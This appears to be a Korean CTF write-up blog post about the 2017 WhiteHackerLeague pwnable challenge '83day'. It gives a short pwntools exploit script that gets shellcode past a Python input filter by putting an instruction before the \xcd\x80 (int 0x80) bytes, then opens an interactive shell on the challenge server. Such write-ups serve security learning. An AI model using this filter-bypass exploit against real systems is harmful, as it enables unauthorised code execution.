-
CAT_SECURITY WhiteHackerLeaguePwnable/CTF 2017. 11. 19. 02:42
83day라는 파이썬 소스가 주어지고 shellcode를 우회하는 문제였다.
12345678910111213141516from pwn import *#p=remote("10.10.134.124",30020)p=remote("127.0.0.1",30030)context(arch="i386",os="linux")print p.recv(1024)p.sendline("mov eax,eax")p.sendline(".byte 0xcd")p.sendline(".byte 0x80")p.sendline("END\n")print asm('int 0x80')p.interactive()처음에 바로 .byte 0xcd로 시작하여서 왜 안될까하다가 소스를 다시 한번 분석해보니 .find >0 0보다 커야된다
맨 처음에 \xcd\x80이 발견되었으니 당연히 find 반환값이 0이여서 \xcd\x80이 제대로 들어갔어도 플래그를 얻을수없다.
그래서 mov eax,eax를 하고 해봤더니 플래그가 나왔다.
요즘 문제가 조금 잘 풀려서 포너블 실력이 많이 좋아졋다고 생각하였는데 아닌것같다.
'Pwnable > CTF' 카테고리의 다른 글
BCTF 2017 Babyuse (1) 2017.12.01 TUCTF 2017 Write up (0) 2017.11.27 RCTF 2017 RNOTE (0) 2017.11.08 RCTF 2017 AirCraft (0) 2017.11.08 RCTF 2015 SHAXPIAN (0) 2017.11.04